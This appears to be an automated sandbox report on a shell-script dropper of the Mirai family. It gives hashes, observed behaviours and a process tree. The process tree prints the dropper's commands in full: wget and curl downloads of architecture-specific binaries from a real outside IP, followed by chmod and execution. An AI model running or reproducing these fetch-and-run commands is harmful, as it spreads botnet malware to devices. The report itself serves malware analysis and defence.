Analysis
-
max time kernel
149s -
max time network
149s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
22-12-2024 12:41
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
8364b34731a2e12ce67c2cfcb2811e75
-
SHA1
5d718457dfa0ecc1a46528696d2769d11adf018f
-
SHA256
cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea
-
SHA512
ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 855 chmod 735 chmod 741 chmod 747 chmod 761 chmod 783 chmod 824 chmod 847 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/Space 736 Space /tmp/Space 742 Space /tmp/Space 748 Space /tmp/Space 762 Space /tmp/Space 784 Space /tmp/Space 825 Space /tmp/Space 848 Space /tmp/Space 856 Space -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-6.dat upx behavioral3/files/fstream-7.dat upx behavioral3/files/fstream-8.dat upx behavioral3/files/fstream-9.dat upx -
description ioc Process File opened for reading /proc/36/status Space File opened for reading /proc/225/status Space File opened for reading /proc/694/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/71/status Space File opened for reading /proc/665/status Space File opened for reading /proc/673/status Space File opened for reading /proc/701/status Space File opened for reading /proc/18/status Space File opened for reading /proc/37/status Space File opened for reading /proc/420/status Space File opened for reading /proc/11/status Space File opened for reading /proc/73/status Space File opened for reading /proc/681/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/6/status Space File opened for reading /proc/14/status Space File opened for reading /proc/24/status Space File opened for reading /proc/68/status Space File opened for reading /proc/77/status Space File opened for reading /proc/781/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/3/status Space File opened for reading /proc/695/status Space File opened for reading /proc/700/status Space File opened for reading /proc/710/status Space File opened for reading /proc/1/status Space File opened for reading /proc/8/status Space File opened for reading /proc/72/status Space File opened for reading /proc/211/status Space File opened for reading /proc/785/status Space File opened for reading /proc/2/status Space File opened for reading /proc/9/status Space File opened for reading /proc/19/status Space File opened for reading /proc/373/status Space File opened for reading /proc/374/status Space File opened for reading /proc/378/status Space File opened for reading /proc/13/status Space File opened for reading /proc/81/status Space File opened for reading /proc/82/status Space File opened for reading /proc/117/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/16/status Space File opened for reading /proc/20/status Space File opened for reading /proc/79/status Space File opened for reading /proc/169/status Space File opened for reading /proc/314/status Space File opened for reading /proc/707/status Space File opened for reading /proc/10/status Space File opened for reading /proc/21/status Space File opened for reading /proc/22/status Space File opened for reading /proc/23/status Space File opened for reading /proc/118/status Space File opened for reading /proc/316/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/4/status Space File opened for reading /proc/17/status Space File opened for reading /proc/672/status Space File opened for reading /proc/784/status Space File opened for reading /proc/69/status Space File opened for reading /proc/145/status Space File opened for reading /proc/7/status Space -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 782 cat 811 wget 812 curl 822 cat 764 wget 772 curl -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/busybox cp File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.x86 curl
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:702 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:706
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/catcat Space.arc2⤵PID:734
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/catcat Space.x862⤵PID:740
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat Space.x86_642⤵PID:746
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:748
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat Space.i6862⤵PID:759
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:772
-
-
/bin/catcat Space.mips2⤵
- System Network Configuration Discovery
PID:782
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:784
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.mips642⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/catcat Space.mips642⤵
- System Network Configuration Discovery
PID:822
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/catcat Space.mpsl2⤵PID:846
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:848
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://154.216.20.221/hiddenbin/Space.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/catcat Space.arm2⤵PID:854
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-d0bc3507f48e4e1c9103bd15daaf5594-systemd-timedated.service-zOyIE72⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/wgetwget http://154.216.20.221/hiddenbin/Space.arm52⤵PID:858
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5b73e8fbb7aee4bbe5902554d6ab22092
SHA1620097bfd55d8ade8d138bb2ba10e8d4c43fd105
SHA25622dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04
SHA512d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8
-
Filesize
36KB
MD557c14d83bcaba972ea0b53c6814e9f65
SHA19834b2c220567c48d38ca9150a65e8145e6a0f36
SHA25607d4715e63470114117c803268c02a590af4e83c00fb0251be96032e136dabbf
SHA5127e14e067f428e598241038c80d517c9d22003e55d32c6bb64b153215b58ca2aee7c3ebf1538989e156c288f61e6f49a858f9cd02e0f4a92d15bc4d772348dd92
-
Filesize
37KB
MD5f1ec41bcdeefed4e7d8a5495c6f07a92
SHA1189e68405fe81999a6743eefb5522b35c5d0056b
SHA256ed564aaa907b55f773c3a1de910979d25652bccb5cc407a260cb16652c2d5cd7
SHA51226cb39a606efc65e524287053445d46639bb88af34cf4d0e81bd55154be8636bf77c36b11822aa355046771267df6a917bce4558780feda0001166d2385a1f04
-
Filesize
43KB
MD5ba5ceb1218e230d2029a3206061e2e92
SHA1f8c1c20e355c1fc999b414141c1e26c456b0241d
SHA256d61fd8e146be70d9228432177c62353000a2b7f3d5576453fe5d04cc2c9afdb2
SHA5127290e14d04ac418f61c2d81affda96b4a9e4e2f2f5725868bc81607377716986e1c37269cad4c6b2aaa8d8de219294e0b35944aecb700c21dbf4d48fed926192
-
Filesize
43KB
MD575efb2b764906fe873de82a5b4668e3e
SHA19139d08f46a873d8b50ae47b5075be34d1bc902c
SHA2564ce9dc550a276e812f9b0ca400702f32b980d2a7d11de0c0e9cc8334e7e2113e
SHA512f343cb138b602029c4c3cc0c4e546a91acb99aea7c005f41a0b3e46da9131db4baf8c7ec94e6983fac554c170065a8100dd4e4c0ecb5f7071d2a1b52d68a3d2d
-
Filesize
113KB
MD50fdd3e751fa9d0f60c5a218e4269c9ad
SHA10d9ae7d06494f59cfc3bfba8e162e29630159be3
SHA25681749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528
SHA5122b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de
-
Filesize
857KB
MD5a39fe8036e559ce804e26518061e59ff
SHA18df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA2563180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d